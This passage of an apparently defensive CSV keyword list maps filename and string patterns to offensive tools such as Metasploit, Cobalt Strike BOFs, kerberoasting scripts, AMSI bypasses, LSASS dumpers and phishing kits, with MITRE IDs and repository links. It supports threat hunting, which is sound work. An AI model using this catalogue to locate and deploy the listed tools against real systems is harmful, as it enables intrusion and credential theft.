-*AtomLdr.vcxproj*,offensive_tool_keyword,AtomLdr,A DLL loader with advanced evasive features,T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002,TA0011 - TA0006 - TA0002 - TA0008 - TA0007,N/A,N/A,Exploitation tools,https://github.com/NUL0x4C/AtomLdr,1,1,N/A,N/A,6,543,78,2023-02-26T19:57:09Z,2023-02-26T17:59:26Z -*AtomLdr-main.zip*,offensive_tool_keyword,AtomLdr,A DLL loader with advanced evasive features,T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002,TA0011 - TA0006 - TA0002 - TA0008 - TA0007,N/A,N/A,Exploitation tools,https://github.com/NUL0x4C/AtomLdr,1,1,N/A,N/A,6,543,78,2023-02-26T19:57:09Z,2023-02-26T17:59:26Z -*ATPMiniDump*,offensive_tool_keyword,ATPMiniDump,Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft. Take a look at this blog post for details. ATPMiniDump was created starting from Outflank-Dumpert then big credits to @Cneelis,T1003 - T1005 - T1055 - T1218,TA0006 - TA0008 - TA0011,N/A,N/A,Credential Access,https://github.com/b4rtik/ATPMiniDump,1,1,N/A,N/A,3,253,53,2019-12-02T15:01:22Z,2019-11-29T19:49:54Z -*--attack nightmare*,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,0,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z -*--attack spoolsample*,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,0,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z -*Attack_AmsiOpenSession.ps1*,offensive_tool_keyword,Amsi_Bypass,Amsi Bypass payload that works on Windwos 11,T1055 - T1055.012 - T1562 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/senzee1984/Amsi_Bypass_In_2023,1,1,N/A,8,3,275,48,2023-07-30T19:17:23Z,2023-07-30T16:14:19Z -*Attack_AmsiScanBuffer.ps1*,offensive_tool_keyword,Amsi_Bypass,Amsi Bypass payload that works on Windwos 11,T1055 - T1055.012 - T1562 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/senzee1984/Amsi_Bypass_In_2023,1,1,N/A,8,3,275,48,2023-07-30T19:17:23Z,2023-07-30T16:14:19Z -*--attacker-page *,offensive_tool_keyword,PrivExchange,Exchange your privileges for Domain Admin privs by abusing Exchange,T1091.001 - T1101 - T1201 - T1570,TA0006,N/A,N/A,Exploitation tools,https://github.com/dirkjanm/PrivExchange,1,0,N/A,N/A,10,905,170,2020-01-23T19:48:51Z,2019-01-21T17:39:47Z -*AttackerSetup(windows).exe*,offensive_tool_keyword,windows-login-phish,Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. This can be used for red teaming or cybersecurity awareness related purposes,T1566,N/A,N/A,N/A,Phishing,https://github.com/CipherKill/windows-login-phish,1,1,N/A,N/A,1,17,5,2022-03-25T05:49:01Z,2022-03-13T20:02:15Z -*AttackerSetup.py*,offensive_tool_keyword,windows-login-phish,Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. This can be used for red teaming or cybersecurity awareness related purposes,T1566,N/A,N/A,N/A,Phishing,https://github.com/CipherKill/windows-login-phish,1,1,N/A,N/A,1,17,5,2022-03-25T05:49:01Z,2022-03-13T20:02:15Z -*AttackerSetup4linux*,offensive_tool_keyword,windows-login-phish,Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. This can be used for red teaming or cybersecurity awareness related purposes,T1566,N/A,N/A,N/A,Phishing,https://github.com/CipherKill/windows-login-phish,1,1,N/A,N/A,1,17,5,2022-03-25T05:49:01Z,2022-03-13T20:02:15Z -*AttackSurfaceMapper-master*,offensive_tool_keyword,AttackSurfaceMapper,AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target,T1595 - T1596,TA0043,N/A,N/A,Reconnaissance,https://github.com/superhedgy/AttackSurfaceMapper,1,1,N/A,6,10,1221,192,2023-09-11T05:26:53Z,2019-08-07T14:32:53Z -*AttackTeamFamily*-bof-toolset*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AttackTeamFamily/cobaltstrike-bof-toolset,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*Attempted to spawn a socks proxy server at 0.0.0.0:*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*Attempting connection from 0.0.0.0:*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*,T1053 - T1064 - T1059 - T1218,TA0002 - TA0007,N/A,N/A,Shell spawning,https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386,1,0,N/A,N/A,10,4011,2166,2017-05-24T21:12:59Z,2017-04-08T14:03:59Z -*AttifyOS*,offensive_tool_keyword,attifyos,AttifyOS is a distro intended to help you perform security assessment and penetration testing of Internet of Things (IoT) devices. It saves you a lot of time by providing a pre-configured environment with all the necessary tools loaded. The new version is based on Ubuntu 18.04 64-Bit - that also means that you'll receive updates for this version till April 2023.,T1559 - T1565 - T1210 - T1189 - T1110,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/adi0x90/attifyos,1,0,N/A,N/A,9,871,159,2021-08-26T13:31:13Z,2017-07-17T01:40:25Z -*attrib +s +h desktop.ini*,greyware_tool_keyword,attrib,NTLM Leak via Desktop.ini,T1555.003 - T1081.001,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*Auditcleaner.*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers anti forensic - cleans up audit.log,T1055 - T1036 - T1038 - T1203 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner,1,0,N/A,N/A,1,0,1,2017-04-10T05:02:35Z,2017-04-10T06:59:29Z -*Augustus-main.zip*,offensive_tool_keyword,Augustus,Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.,T1055.012 - T1027.002 - T1136.001 - T1562.001,TA0005 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/TunnelGRE/Augustus,1,1,N/A,6,2,107,23,2023-08-27T10:37:51Z,2023-08-21T15:08:40Z -*ausecwa/bof-registry*,offensive_tool_keyword,cobaltstrike,Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ausecwa/bof-registry,1,1,N/A,10,10,17,7,2021-02-11T04:38:28Z,2021-01-29T05:07:47Z -*auth/cc2_ssh.*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*auto_brute.rc*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*auto_exploit_blank_password*,offensive_tool_keyword,pxethief,PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager,T1555.004 - T1555.002,TA0006,N/A,N/A,Credential Access,https://github.com/MWR-CyberSec/PXEThief,1,1,N/A,N/A,3,220,27,2023-05-18T19:55:17Z,2022-08-12T22:16:46Z -*auto_pass_the_hash.*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*auto_pass_the_hash.rc*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*auto_target_linux.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*auto_target_windows.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*autobloody -*,offensive_tool_keyword,autobloody,Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/autobloody,1,0,N/A,10,4,330,38,2023-09-01T06:41:34Z,2022-09-07T13:34:30Z -*autobloody.py*,offensive_tool_keyword,autobloody,Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/autobloody,1,1,N/A,10,4,330,38,2023-09-01T06:41:34Z,2022-09-07T13:34:30Z -*autobloody-main*,offensive_tool_keyword,autobloody,Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/autobloody,1,1,N/A,10,4,330,38,2023-09-01T06:41:34Z,2022-09-07T13:34:30Z -*AutoBypass.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*AutoC2.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,1,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*AutoC2/All.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*AutoC2/C2*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,1,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*AutoC2/Dependencies*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,1,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*AutoC2/Initial_Access*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,1,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*AutoC2/Lateral.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*AutoC2/Payload_Development*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,1,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*AutoC2/Recon*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,1,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*AutoC2/Situational_Awareness*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,1,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*AutoC2/Social.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*AutoC2/Staging*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,1,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*AutoC2/Web.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*AutoC2/Wireless.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*AutoC2/Wordlists*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,1,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*AutoCompletionHandlerC2ServerManager*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*autodiscover/brute.go*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,1,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -*autoexploit.rc*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*autokerberoast.ps1*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/xan7r/kerberoast,1,1,N/A,N/A,1,71,20,2017-07-22T22:28:12Z,2016-06-08T22:58:45Z -*autokerberoast_noMimikatz.ps1,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/xan7r/kerberoast,1,1,N/A,N/A,1,71,20,2017-07-22T22:28:12Z,2016-06-08T22:58:45Z -*autoKirbi2hashcat.py*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential Access,https://github.com/xan7r/kerberoast,1,1,N/A,N/A,1,71,20,2017-07-22T22:28:12Z,2016-06-08T22:58:45Z -*autolace.twilightparadox.com*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*automachine.servequake.com*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*AutoNSE*,offensive_tool_keyword,autonse,Massive NSE (Nmap Scripting Engine) AutoSploit and AutoScanner. The Nmap Scripting Engine (NSE) is one of Nmaps most powerful and flexible features. It allows users to write (and share) simple scripts (using the Lua programming language ) to automate a wide variety of networking tasks. Those scripts are executed in parallel with the speed and efficiency you expect from Nmap. Users can rely on the growing and diverse set of scripts distributed with Nmap. or write their own to meet custom needs. For more informations https://nmap.org/book/man-nse.html,T1059.001 - T1059.003 - T1059.005 - T1059.006 - T1027 - T1064 - T1086 - T1085,TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/m4ll0k/AutoNSE,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*autopwn*,offensive_tool_keyword,autopwn,tools for pentester. autopwn is designed to make a pentesters life easier and more consistent by allowing them to specify tools they would like to run against targets. without having to type them in a shell or write a script. This tool will probably be useful during certain exams as well..,T1583 - T1059 - T1216 - T1053 - T1027,TA0002 - TA0008 - TA0003,N/A,N/A,Exploitation tools,https://github.com/nccgroup/autopwn,1,1,N/A,N/A,4,375,102,2019-04-23T09:58:28Z,2015-02-23T08:18:01Z -*AutoRDPwn*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*AutoSmuggle.csproj*,offensive_tool_keyword,AutoSmuggle,Utility to craft HTML or SVG smuggled files for Red Team engagements,T1027.006 - T1598,TA0005 - TA0043,N/A,N/A,Defense Evasion,https://github.com/surajpkhetani/AutoSmuggle,1,1,N/A,9,2,141,21,2023-09-02T08:09:50Z,2022-03-20T19:02:06Z -*AutoSmuggle.exe*,offensive_tool_keyword,AutoSmuggle,Utility to craft HTML or SVG smuggled files for Red Team engagements,T1027.006 - T1598,TA0005 - TA0043,N/A,N/A,Defense Evasion,https://github.com/surajpkhetani/AutoSmuggle,1,1,N/A,9,2,141,21,2023-09-02T08:09:50Z,2022-03-20T19:02:06Z -*AutoSmuggle.sln*,offensive_tool_keyword,AutoSmuggle,Utility to craft HTML or SVG smuggled files for Red Team engagements,T1027.006 - T1598,TA0005 - TA0043,N/A,N/A,Defense Evasion,https://github.com/surajpkhetani/AutoSmuggle,1,1,N/A,9,2,141,21,2023-09-02T08:09:50Z,2022-03-20T19:02:06Z -*AutoSmuggle-master*,offensive_tool_keyword,AutoSmuggle,Utility to craft HTML or SVG smuggled files for Red Team engagements,T1027.006 - T1598,TA0005 - TA0043,N/A,N/A,Defense Evasion,https://github.com/surajpkhetani/AutoSmuggle,1,1,N/A,9,2,141,21,2023-09-02T08:09:50Z,2022-03-20T19:02:06Z -*autostart/ares.desktop*,offensive_tool_keyword,Ares,Python C2 botnet and backdoor ,T1105 - T1102 - T1055,TA0003 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/sweetsoftware/Ares,1,0,N/A,10,10,1439,523,2023-03-02T12:43:09Z,2015-10-18T12:26:27Z -*autoTGS_NtlmCrack.py*,offensive_tool_keyword,kerberoast,Kerberoast is a series of tools for attacking MS Kerberos implementations,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Credential 